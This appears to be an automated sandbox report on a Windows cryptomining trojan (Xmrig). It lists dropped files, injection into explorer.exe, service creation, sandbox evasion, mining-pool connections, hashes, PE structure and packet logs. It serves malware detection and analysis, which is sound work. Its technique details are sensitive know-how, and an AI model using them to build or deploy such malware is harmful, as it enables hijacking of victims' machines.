            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeMemory written: PID: 3136 base: 140001000 value: NUJump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeMemory written: PID: 3136 base: 140665000 value: DFJump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeMemory written: PID: 3136 base: 140834000 value: 00Jump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeMemory written: PID: 3136 base: 37F010 value: 00Jump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeThread register set: target process: 2792Jump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeThread register set: target process: 3136Jump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            11
            Windows Service
            11
            Windows Service
            1
            Masquerading
            OS Credential Dumping321
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Service Execution
            1
            DLL Side-Loading
            311
            Process Injection
            12
            Virtualization/Sandbox Evasion
            LSASS Memory12
            Virtualization/Sandbox Evasion
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            311
            Process Injection
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS3
            System Information Discovery
            Distributed Component Object ModelInput Capture1
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570391 Sample: LfHJdrALlh.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 40 xmr-eu1.nanopool.org 2->40 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected Xmrig cryptocurrency miner 2->46 48 Sigma detected: Stop EventLog 2->48 50 AI detected suspicious sample 2->50 8 ograohtgkfie.exe 1 2->8         started        12 LfHJdrALlh.exe 2 2->12         started        signatures3 52 DNS related to crypt mining pools 40->52 process4 file5 36 C:\Windows\Temp\xvkjzlkkmfrj.sys, PE32+ 8->36 dropped 54 Multi AV Scanner detection for dropped file 8->54 56 Injects code into the Windows Explorer (explorer.exe) 8->56 58 Modifies the context of a thread in another process (thread injection) 8->58 60 Sample is not signed and drops a device driver 8->60 14 explorer.exe 8->14         started        18 conhost.exe 8->18         started        38 C:\ProgramData\...\ograohtgkfie.exe, PE32+ 12->38 dropped 20 sc.exe 1 12->20         started        22 sc.exe 1 12->22         started        24 sc.exe 1 12->24         started        26 sc.exe 1 12->26         started        signatures6 process7 dnsIp8 42 xmr-eu1.nanopool.org 51.15.58.224, 10343, 49704 OnlineSASFR France 14->42 62 System process connects to network (likely due to code injection or exploit) 14->62 64 Query firmware table information (likely to detect VMs) 14->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->66 28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            LfHJdrALlh.exe66%ReversingLabsWin64.Trojan.MintZard
            SourceDetectionScannerLabelLink
            C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe66%ReversingLabsWin64.Trojan.MintZard
            C:\Windows\Temp\xvkjzlkkmfrj.sys5%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.cloudflare.com/origin_ca.crlQr0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            xmr-eu1.nanopool.org
            51.15.58.224
            truefalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://ocsp.cloudflare.com/origin_caYexplorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://ocsp.cloudflare.com/origin_caexplorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://crl.cloudflare.com/origin_ca.crlQrexplorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.cloudflare.com/origin_ca0explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        51.15.58.224
                        xmr-eu1.nanopool.orgFrance
                        12876OnlineSASFRfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1570391
                        Start date and time:2024-12-06 22:41:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 53s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:LfHJdrALlh.exe
                        renamed because original name is a hash value
                        Original Sample Name:0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999.exe
                        Detection:MAL
                        Classification:mal100.evad.mine.winEXE@18/2@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 5
                        • Number of non-executed functions: 25
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: LfHJdrALlh.exe
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        51.15.58.224file.exeGet hashmaliciousXmrigBrowse
                          aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                            25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                              8EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                                file.exeGet hashmaliciousGlupteba, SmokeLoader, XmrigBrowse
                                  file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                    file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                      file.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                        file.exeGet hashmaliciousXmrigBrowse
                                          file.exeGet hashmaliciousXmrigBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            xmr-eu1.nanopool.orgrLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.65.182
                                            6xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                                            • 51.89.23.91
                                            4o8Tgrb384.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.65.182
                                            rtYpMDeKUq.exeGet hashmaliciousXmrigBrowse
                                            • 51.89.23.91
                                            NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                            • 54.37.137.114
                                            ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                            • 54.37.232.103
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 163.172.154.142
                                            HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                            • 162.19.224.121
                                            12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.65.182
                                            Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                            • 51.15.58.224
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            OnlineSASFRl64.elfGet hashmaliciousXmrigBrowse
                                            • 51.158.204.249
                                            Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                            • 163.172.240.109
                                            EHak.exeGet hashmaliciousUnknownBrowse
                                            • 62.210.124.132
                                            EHak.exeGet hashmaliciousUnknownBrowse
                                            • 62.210.124.132
                                            teste.i686.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                            • 51.158.21.23
                                            teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                            • 51.158.232.110
                                            rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                                            • 212.47.253.124
                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                                            • 163.172.171.111
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 163.172.171.111
                                            https://antiphishing.vadesecure.com/v4?f=U3NocHNZUmllMWk0MmdjMYDgQ0wsRYjjfDkZnUsmsqS3bv-gdJZTKaN5KSsipRTf&i=cnNwakphM05sN25WcmhxVcUfrB8NjiRd7gd4RsoOTL4&k=A3pt&r=UUJQWml1Y2NtejlnWDZLZB0Eg6oPQLWHk5a0M-cKRXyoaPvtU4tInW_VqCgS4DhSa_cUZCcNAUmWLKbw9MOxGw&s=bf71d8ade961f6ab439c8235babb7157b334d689888d3083d0cc1744cfe48aaf&u=https%3A%2F%2Fpublic-fra.mkt.dynamics.com%2Fapi%2Forgs%2F85a8c477-bea7-ef11-8a66-0022483994f9%2Fr%2FMKSqoVs73k-RUO5uHPfRswIAAAA%3Ftarget%3D%257B%2522TargetUrl%2522%253A%2522https%25253A%25252F%25252Fassets-fra.mkt.dynamics.com%25252F85a8c477-bea7-ef11-8a66-0022483994f9%25252Fdigitalassets%25252Fstandaloneforms%25252F46042089-b8ac-ef11-a72d-6045bd6e29e8%2522%252C%2522RedirectOptions%2522%253A%257B%25226%2522%253A%2522mktprf9fb729cc84d74db3bce9a30da7409e87eoprf%2522%252C%25221%2522%253Anull%257D%257D%26digest%3Djuexwq7Jl6DCR7CneIIynCjAtNPRJ1FxLmm99rnbDLA%253D%26secretVersion%3D02e7c83d621d4269af2f08a8e4e233cfGet hashmaliciousUnknownBrowse
                                            • 163.172.240.109
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Windows\Temp\xvkjzlkkmfrj.sysiKvzvknzW1.exeGet hashmaliciousXmrigBrowse
                                              2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                  f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                    luQ2wBh8q6.exeGet hashmaliciousXmrigBrowse
                                                      lokigod.exeGet hashmaliciousXmrigBrowse
                                                        nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                          File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                            rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                                                              newtpp.exeGet hashmaliciousXmrigBrowse
                                                                Process:C:\Users\user\Desktop\LfHJdrALlh.exe
                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2623488
                                                                Entropy (8bit):6.5318384666570575
                                                                Encrypted:false
                                                                SSDEEP:49152:Z8KPU0y2Nb3AqgMlXcSvX5uYClYynHgSCQQIsL/H/xyNFbF1dFxg++jrhH0JSr:ZvPUn2FAqZlf5uYClYyASCQQIIpyNFpW
                                                                MD5:17E83A7EF86ED642E8182C051CD382FA
                                                                SHA1:D5D3E3D6A8B9566B58275CE9C200E9B74F2310EC
                                                                SHA-256:0E540D9532A8EA783D15290E948D2E0B744C5C61DC7D1953FCFEF1AEDA4BE999
                                                                SHA-512:BBD50377AF9486BA84DA4DA23534C92D13EB3CBBD9B63DD075A01099C0FAF819C0A8D8AEF738B9A072DDB49DF57CF71E541A44E887ADFC22F13451C6D43B1F44
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....mSg.........."......f....'.....@..........@..............................(...........`.................................................@...<....`(......0(..............p(.x...............................(.......8..............X............................text....d.......f.................. ..`.rdata...............j..............@..@.data... .'......x'.................@....pdata.......0(.......'.............@..@.00cfg.......@(.......'.............@..@.tls.........P(.......(.............@....rsrc........`(.......(.............@..@.reloc..x....p(.......(.............@..B........................................................................................................................................................................................................................................................................................................
                                                                Process:C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Joe Sandbox View:
                                                                • Filename: iKvzvknzW1.exe, Detection: malicious, Browse
                                                                • Filename: 2zirzlMVqX.bat, Detection: malicious, Browse
                                                                • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                • Filename: f5TWdT5EAc.exe, Detection: malicious, Browse
                                                                • Filename: luQ2wBh8q6.exe, Detection: malicious, Browse
                                                                • Filename: lokigod.exe, Detection: malicious, Browse
                                                                • Filename: nfkciRoR4j.exe, Detection: malicious, Browse
                                                                • Filename: File.exe, Detection: malicious, Browse
                                                                • Filename: rLaC8kO1rD.exe, Detection: malicious, Browse
                                                                • Filename: newtpp.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):6.5318384666570575
                                                                TrID:
                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:LfHJdrALlh.exe
                                                                File size:2'623'488 bytes
                                                                MD5:17e83a7ef86ed642e8182c051cd382fa
                                                                SHA1:d5d3e3d6a8b9566b58275ce9c200e9b74f2310ec
                                                                SHA256:0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999
                                                                SHA512:bbd50377af9486ba84da4da23534c92d13eb3cbbd9b63dd075a01099c0faf819c0a8d8aef738b9a072ddb49df57cf71e541a44e887adfc22f13451c6d43b1f44
                                                                SSDEEP:49152:Z8KPU0y2Nb3AqgMlXcSvX5uYClYynHgSCQQIsL/H/xyNFbF1dFxg++jrhH0JSr:ZvPUn2FAqZlf5uYClYyASCQQIIpyNFpW
                                                                TLSH:46C5332D7DAA719CC75993719D712EBA226E52784BE07BCBAFE0153030E1ADA703C51C
                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....mSg.........."......f....'.....@..........@..............................(...........`........................................
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x140001140
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x140000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67536D18 [Fri Dec 6 21:31:04 2024 UTC]
                                                                TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:de41d4e0545d977de6ca665131bb479a
                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [00006ED5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007F1998ED914Fh
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                inc ecx
                                                                push edi
                                                                inc ecx
                                                                push esi
                                                                push esi
                                                                push edi
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov eax, dword ptr [00000030h]
                                                                dec eax
                                                                mov edi, dword ptr [eax+08h]
                                                                dec eax
                                                                mov esi, dword ptr [00006EC9h]
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007F1998ED9170h
                                                                dec eax
                                                                cmp edi, eax
                                                                je 00007F1998ED916Bh
                                                                dec esp
                                                                mov esi, dword ptr [00008371h]
                                                                nop word ptr [eax+eax+00000000h]
                                                                mov ecx, 000003E8h
                                                                inc ecx
                                                                call esi
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007F1998ED9147h
                                                                dec eax
                                                                cmp edi, eax
                                                                jne 00007F1998ED9129h
                                                                dec eax
                                                                mov edi, dword ptr [00006E90h]
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007F1998ED914Eh
                                                                mov ecx, 0000001Fh
                                                                call 00007F1998EDF284h
                                                                jmp 00007F1998ED9169h
                                                                cmp dword ptr [edi], 00000000h
                                                                je 00007F1998ED914Bh
                                                                mov byte ptr [00280519h], 00000001h
                                                                jmp 00007F1998ED915Bh
                                                                mov dword ptr [edi], 00000001h
                                                                dec eax
                                                                mov ecx, dword ptr [00006E7Ah]
                                                                dec eax
                                                                mov edx, dword ptr [00006E7Bh]
                                                                call 00007F1998EDF27Bh
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007F1998ED915Bh
                                                                dec eax
                                                                mov ecx, dword ptr [00006E50h]
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x92400x3c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2860000x308.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2830000x180.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2870000x78.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x80a00x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x84100x138.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x93d80x158.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x64960x6600c5668ca78b285355c264a0aca6e42994False0.5279947916666666data6.19072184207683IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x19880x1a00464b9ca302022e1e99eba48b143734a0False0.4495192307692308data4.677794278098306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x2783200x2778005df1dacb2deaaf69a471cba3ad114c75unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .pdata0x2830000x1800x20074eef9a2c83fa45622c5ffeab6310291False0.505859375data3.1195390267160135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .00cfg0x2840000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .tls0x2850000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x2860000x3080x4000cdaac1cdceefd04975538f3236866cfFalse0.3076171875data2.4479478225661677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x2870000x780x200b6f3e954a379cd58bd63cbc7d485b016False0.22265625data1.430821234982099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_VERSION0x2860600x2a8dataEnglishUnited States0.4117647058823529
                                                                DLLImport
                                                                msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 6, 2024 22:41:58.869431019 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:41:58.989295959 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:41:58.989420891 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:41:58.989725113 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:41:59.109682083 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:00.232450008 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:00.232584000 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:00.232659101 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:00.309392929 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:00.429274082 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:00.701136112 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:00.741938114 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:00.933928013 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:00.976377964 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:07.306174994 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:07.523274899 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:17.312701941 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:17.427985907 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:27.314820051 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:27.413923979 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:37.332137108 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:37.382694006 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:47.310152054 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:47.351460934 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:42:57.313225985 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:42:57.367140055 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:43:07.500061989 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:43:07.554650068 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:43:17.364459038 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:43:17.414102077 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:43:27.404104948 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:43:27.445349932 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:43:37.444704056 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:43:37.493377924 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:43:47.357342005 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:43:47.398530006 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:43:57.443902016 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:43:57.492326975 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:44:07.378065109 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:44:07.429863930 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:44:17.379659891 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:44:17.429856062 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:44:27.410175085 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:44:27.461139917 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:44:43.306826115 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:44:43.351844072 CET4970410343192.168.2.551.15.58.224
                                                                Dec 6, 2024 22:44:53.287401915 CET103434970451.15.58.224192.168.2.5
                                                                Dec 6, 2024 22:44:53.336220026 CET4970410343192.168.2.551.15.58.224
